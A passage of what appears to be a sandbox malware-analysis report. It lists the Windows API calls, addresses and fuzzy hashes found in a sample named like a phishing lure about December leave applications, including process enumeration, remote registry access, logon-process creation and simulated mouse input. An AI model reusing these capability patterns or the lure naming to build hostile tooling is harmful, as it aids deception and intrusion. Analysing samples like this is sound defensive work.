                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: 6cd15c6fe0caf72bbbd83dee9588890f8a10a7d314d7b032ed362aefdc92d50d
                                                      • Instruction ID: 46cc528043080fe95aaf47a4a3786c1172c3c8e0dfacb20c318ab2bb3fde4251
                                                      • Opcode Fuzzy Hash: 6cd15c6fe0caf72bbbd83dee9588890f8a10a7d314d7b032ed362aefdc92d50d
                                                      • Instruction Fuzzy Hash: 8AB16F7990024ADBEF10CFA8C4807EDB7B1FF08750F149529ED5AEB254DB30A950EBA4
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FE1C18
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FE1C26
                                                      • __wsplitpath.LIBCMT ref: 00FE1C54
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscat.LIBCMT ref: 00FE1C69
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FE1CDF
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00FE1CF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID:
                                                      • API String ID: 1380811348-0
                                                      • Opcode ID: 6b36c242c0d5bbd088453e06751e489fcbdd71f6d650914c3341a0a9dbb5b6b9
                                                      • Instruction ID: eb2745023642000c8c3ccbc8a55302d13f0a432d28122fde0fc05626bda91b50
                                                      • Opcode Fuzzy Hash: 6b36c242c0d5bbd088453e06751e489fcbdd71f6d650914c3341a0a9dbb5b6b9
                                                      • Instruction Fuzzy Hash: FD516B71504340AFD720EF65CC85EABB7ECEF88754F00492EF58697291EB749A04DBA2
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE30AF
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE30EF
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00FE3112
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FE313B
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FE317E
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE318B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 3451389628-0
                                                      • Opcode ID: 0c86d003276c0bd87af72dafaae996a336a0f76ecbe132f1ad4ed749fcd30823
                                                      • Instruction ID: 8188e762efb77548e2d6da2f5f01a55f0e4ae2886e6185dc907348b5ffb089ae
                                                      • Opcode Fuzzy Hash: 0c86d003276c0bd87af72dafaae996a336a0f76ecbe132f1ad4ed749fcd30823
                                                      • Instruction Fuzzy Hash: 58514931504340AFC710EF64CC99EAAB7E9BF88314F04491DF59587291DB79EA05EB52
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00FE8540
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FE8577
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FE859F
                                                      • GetMenuItemID.USER32(?,?), ref: 00FE860E
                                                      • GetSubMenu.USER32(?,?), ref: 00FE861C
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00FE866D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: a3a2cf84fd9ca1307bda759da3f3929b0aabb812f3b4a59c446723d209e872f6
                                                      • Instruction ID: 00029f38d9515970381185bcf9bf4e5d028e018388682d88c84737d4d6ff1a79
                                                      • Opcode Fuzzy Hash: a3a2cf84fd9ca1307bda759da3f3929b0aabb812f3b4a59c446723d209e872f6
                                                      • Instruction Fuzzy Hash: 95519D31E00215AFCF11EF95C941AAEB7F4BF48360F144459E91ABB341CF39AE41AB90
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC4B10
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4B5B
                                                      • IsMenu.USER32(00000000), ref: 00FC4B7B
                                                      • CreatePopupMenu.USER32 ref: 00FC4BAF
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00FC4C0D
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FC4C3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 42bbcad88240b0e45f67dab1b511ce0fd952dc0499774cf0aa8a6b06d70c56c2
                                                      • Instruction ID: dfc574e984c6bdc43c7cc80d5f4c31d67ba5d2818a522fe8d8b940bf47fc527b
                                                      • Opcode Fuzzy Hash: 42bbcad88240b0e45f67dab1b511ce0fd952dc0499774cf0aa8a6b06d70c56c2
                                                      • Instruction Fuzzy Hash: E851F470A0120ADFDF21CF64CA96FADBBF4AF84324F14411DE465972A1D375AD44EB11
                                                      APIs
                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0101DC00), ref: 00FD8E7C
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8E89
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00FD8EAD
                                                       • #16.WSOCK32(?,?,00000000,00000000), ref: 00FD8EC5 (import by ordinal; ordinal 16 of WSOCK32.dll is recv)
                                                      • _strlen.LIBCMT ref: 00FD8EF7
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8F6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_strlenselect
                                                      • String ID:
                                                      • API String ID: 2217125717-0
                                                      • Opcode ID: dc7e5ff0aa83307e26b771b02221b94c5cdbd8bdc93223b90ef231250db700ea
                                                      • Instruction ID: 13b1d1faa0f1cf7e97625aeab0acb0285e7438e7fac66f4f8d6389772f93a8a8
                                                      • Opcode Fuzzy Hash: dc7e5ff0aa83307e26b771b02221b94c5cdbd8bdc93223b90ef231250db700ea
                                                      • Instruction Fuzzy Hash: 5741C471900104AFCB14EBA4CD96FEEB7BAAF48354F14465AF11A97291EF34AE00DB60
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • BeginPaint.USER32(?,?,?), ref: 00F9AC2A
                                                      • GetWindowRect.USER32(?,?), ref: 00F9AC8E
                                                      • ScreenToClient.USER32(?,?), ref: 00F9ACAB
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F9ACBC
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00F9AD06
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FFE673
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 2592858361-0
                                                      • Opcode ID: 135b6e251c7c0f642c09d04bcc1e313eea68f625194e0fedd65ebcb3d7f9f5f0
                                                      • Instruction ID: 88fbb865b5639a3305793476c43bfe02f4925439d424445295b645d52b7f709b
                                                      • Opcode Fuzzy Hash: 135b6e251c7c0f642c09d04bcc1e313eea68f625194e0fedd65ebcb3d7f9f5f0
                                                      • Instruction Fuzzy Hash: BF41D375504304AFDB21DF64D884F767BA8EF59320F040669FA94872A1C735E884EBA2
                                                      APIs
                                                      • ShowWindow.USER32(01041628,00000000,01041628,00000000,00000000,01041628,?,00FFDC5D,00000000,?,00000000,00000000,00000000,?,00FFDAD1,00000004), ref: 00FEE40B
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00FEE42F
                                                      • ShowWindow.USER32(01041628,00000000), ref: 00FEE48F
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00FEE4A1
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00FEE4C5
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FEE4E8
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: c57243a1ededabf9aa0f498711438e0913321838bffacd958b27bbe2450e0be7
                                                      • Instruction ID: 30a8b13338a1c03f6b1aba47e1f808f2ade2d7e5bf6faa9fc6f58ff5bafd6b1d
                                                      • Opcode Fuzzy Hash: c57243a1ededabf9aa0f498711438e0913321838bffacd958b27bbe2450e0be7
                                                      • Instruction Fuzzy Hash: CC418338A01580EFDB22CF65D499B947BE1BF09324F1841B9EA5C8F2E2C735E845DB61
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FC98D1
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FC9908
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00FC9924
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00FC999E
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FC99B3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC99D2
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 2537439066-0
                                                      • Opcode ID: 7abdd07c693175c904fa7bc925b020f09acd7b2675032c6eb4340157523cb53f
                                                      • Instruction ID: bc11d40bf1039d92f72354a5d2ef4e9085b98748aaaa0961dbe986abd1567add
                                                      • Opcode Fuzzy Hash: 7abdd07c693175c904fa7bc925b020f09acd7b2675032c6eb4340157523cb53f
                                                      • Instruction Fuzzy Hash: F3315031900205EBDF11EFA5DD85EAAB778FF44310F1480A9E905EB24AD779DE14EBA0
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00FD77F4,?,?,00000000,00000001), ref: 00FD9B53
                                                        • Part of subcall function 00FD6544: GetWindowRect.USER32(?,?), ref: 00FD6557
                                                      • GetDesktopWindow.USER32 ref: 00FD9B7D
                                                      • GetWindowRect.USER32(00000000), ref: 00FD9B84
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FD9BB6
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      • GetCursorPos.USER32(?), ref: 00FD9BE2
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FD9C44
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: b82716280c007f5dc7dba3fb0f947923e763dcaa024cb45420ac6bcec06d0190
                                                      • Instruction ID: 118211e704aa04a5d1fbd246f1872e1af8800e74e5c2e93d2e20c577ef8584d7
                                                      • Opcode Fuzzy Hash: b82716280c007f5dc7dba3fb0f947923e763dcaa024cb45420ac6bcec06d0190
                                                      • Instruction Fuzzy Hash: F431D472508306ABC720DF94DC49F9BB7EAFF89314F04091AF585E7281DA75EA08CB91
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FBAFAE
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00FBAFB5
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FBAFC4
                                                      • CloseHandle.KERNEL32(00000004), ref: 00FBAFCF
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FBAFFE
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FBB012
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 9cfc97db141deb281bc25fe469442186ca1472cf6f6e8232d4e98562589813ca
                                                      • Instruction ID: 4de98fda42b410c3aa4e4ff8b67753869d0c8a1dd47d2747798d57786ae21c72
                                                      • Opcode Fuzzy Hash: 9cfc97db141deb281bc25fe469442186ca1472cf6f6e8232d4e98562589813ca
                                                      • Instruction Fuzzy Hash: EB2188B250020DAFCF128FE9E909FEE7BA9EF44354F048025FA01A2151D37ADD20EB61
                                                      APIs
                                                        • Part of subcall function 00F9AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9AFF2
                                                        • Part of subcall function 00F9AF83: BeginPath.GDI32(?), ref: 00F9B009
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9B033
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00FEEC20
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00FEEC34
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FEEC42
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00FEEC52
                                                      • EndPath.GDI32(00000000), ref: 00FEEC62
                                                      • StrokePath.GDI32(00000000), ref: 00FEEC72
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 053cb622c78aace40e58b89b5bea4780e10732d71f8f3794bc6750d5f5693453
                                                      • Instruction ID: 61a5f1c8b935d1329033c71a1029ee306006b825fd2037590658dc751be0a447
                                                      • Opcode Fuzzy Hash: 053cb622c78aace40e58b89b5bea4780e10732d71f8f3794bc6750d5f5693453
                                                      • Instruction Fuzzy Hash: C6113976000149BFEF229FD4DD88FEA7F6DEB083A0F048022BE4889164C7769D55DBA0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FBE1C0
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FBE1D1
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FBE1D8
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FBE1E0
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FBE1F7
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00FBE209
                                                        • Part of subcall function 00FB9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00FB9A05,00000000,00000000,?,00FB9DDB), ref: 00FBA53A
                                                      Similarity
                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                      • String ID:
                                                      • API String ID: 603618608-0
                                                      • Opcode ID: e9843aa6273005b5e1de0e0ef731348c0c94d50dfcec3b889a97873b51053fe8
                                                      • Instruction ID: bb516c9146f851597d6c07d4162981790d5d950c1b2ffa9686b824f86b2343fd
                                                      • Opcode Fuzzy Hash: e9843aa6273005b5e1de0e0ef731348c0c94d50dfcec3b889a97873b51053fe8
                                                      • Instruction Fuzzy Hash: 6F018FB5E00214BFEB109BE68C45B9EBFB9EB48351F004066EA08A7280DA759C01CFB0
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00FA7B47
                                                        • Part of subcall function 00FA123A: __initp_misc_winsig.LIBCMT ref: 00FA125E
                                                        • Part of subcall function 00FA123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FA7F51
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FA7F65
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FA7F78
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FA7F8B
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FA7F9E
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FA7FB1
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FA7FC4
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FA7FD7
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FA7FEA
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FA7FFD
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FA8010
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FA8023
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FA8036
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FA8049
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FA805C
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00FA806F
                                                      • __mtinitlocks.LIBCMT ref: 00FA7B4C
                                                        • Part of subcall function 00FA7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0103AC68,00000FA0,?,?,00FA7B51,00FA5E77,01036C70,00000014), ref: 00FA7E41
                                                      • __mtterm.LIBCMT ref: 00FA7B55
                                                        • Part of subcall function 00FA7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FA7B5A,00FA5E77,01036C70,00000014), ref: 00FA7D3F
                                                        • Part of subcall function 00FA7BBD: _free.LIBCMT ref: 00FA7D46
                                                        • Part of subcall function 00FA7BBD: DeleteCriticalSection.KERNEL32(0103AC68,?,?,00FA7B5A,00FA5E77,01036C70,00000014), ref: 00FA7D68
                                                      • __calloc_crt.LIBCMT ref: 00FA7B7A
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FA7BA3
                                                      Similarity
                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 2942034483-0
                                                      • Opcode ID: bd0ecfa3e02fc47322f7f34e90d5a8876db56498d8219f2b8c85810aeda9d154
                                                      • Instruction ID: db98fd17e194b8bbc00fc9319efba5b60ace41a677613241972b46c7d8b0ebf7
                                                      • Opcode Fuzzy Hash: bd0ecfa3e02fc47322f7f34e90d5a8876db56498d8219f2b8c85810aeda9d154
                                                      • Instruction Fuzzy Hash: 24F096F251D31119E6357774BC46E4B36D8AF83770F240699F8A0C50DAFF2D884161B0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F8281D
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F82825
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F82830
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F8283B
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F82843
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8284B
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 8b558b3f3b82defa7c1c7848fde449488c55ed75d91c12809a8fbcb6cd3264ee
                                                      • Instruction ID: 711a4ae2361d3fcf022ffd8b4e70d22d029270f5b37eca669703bf6fbc17711c
                                                      • Opcode Fuzzy Hash: 8b558b3f3b82defa7c1c7848fde449488c55ed75d91c12809a8fbcb6cd3264ee
                                                      • Instruction Fuzzy Hash: 690167B0902B5ABDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 1423608774-0
                                                      • Opcode ID: af044a6da4511f08b6b431910030a54183ab3ec06ded30326803bf909376f5fe
                                                      • Instruction ID: 128a3bce610fbb1ec7c9ed02a5bb9a419961155dab3028debef03175c427d53b
                                                      • Opcode Fuzzy Hash: af044a6da4511f08b6b431910030a54183ab3ec06ded30326803bf909376f5fe
                                                      • Instruction Fuzzy Hash: 54018632506612ABD7261BD4ED4DEEB7769FF98721B04042DF54392088DBBD9800EB60
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FC7C07
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FC7C1D
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00FC7C2C
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C3B
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C45
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C4C
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 1ed5209458853ffb12d688d1b745b6c15c50e344883c844fd77ba12adb3f24f2
                                                      • Instruction ID: 7f354f799f356a634401bda845e9cd8c12c97d5f6bcd0edebb77338cc0ca9bb8
                                                      • Opcode Fuzzy Hash: 1ed5209458853ffb12d688d1b745b6c15c50e344883c844fd77ba12adb3f24f2
                                                      • Instruction Fuzzy Hash: 9EF06772201158BBE6325BD29C0EEEF3B7CEBCAB11F000018FA4192045DBAA1A41D7B4
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00FC9A33
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A44
                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A51
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A5E
                                                        • Part of subcall function 00FC93D1: CloseHandle.KERNEL32(?,?,00FC9A6B,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC93DB
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC9A71
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A78
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 69e80c4142a5faad0dcfbfa78bf9c9eae79d9b791050ac73b43db5ac4dda7e1c
                                                      • Instruction ID: 990f04636cc80f9902e472661d6f766bb61ede878e0bd57b34e7355c83ca3952
                                                      • Opcode Fuzzy Hash: 69e80c4142a5faad0dcfbfa78bf9c9eae79d9b791050ac73b43db5ac4dda7e1c
                                                      • Instruction Fuzzy Hash: 59F0BE32545602ABD3221BE4FD8DEAA3729FF98321F040025F24391098CBBE9800EB60
                                                      APIs
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • __swprintf.LIBCMT ref: 00F81EA6
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F81D49
                                                      Similarity
                                                      • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 2125237772-557222456
                                                      • Opcode ID: e7a1d59c7b6c263d8bf6613d8dde6efef4ab2ab67cb65c9c04fabbab842a9151
                                                      • Instruction ID: 448fcd16d90b4e80cbbacf061d3a4655b7752324f3d0d617394f6798780c15c4
                                                      • Opcode Fuzzy Hash: e7a1d59c7b6c263d8bf6613d8dde6efef4ab2ab67cb65c9c04fabbab842a9151
                                                      • Instruction Fuzzy Hash: 2691AA726042059FC724FF24CD86CAEB7A8BF85710F04491DF986972A1DB34ED05EB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FDB006
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FDB115
                                                      • VariantClear.OLEAUT32(?), ref: 00FDB298
                                                        • Part of subcall function 00FC9DC5: VariantInit.OLEAUT32(00000000), ref: 00FC9E05
                                                        • Part of subcall function 00FC9DC5: VariantCopy.OLEAUT32(?,?), ref: 00FC9E0E
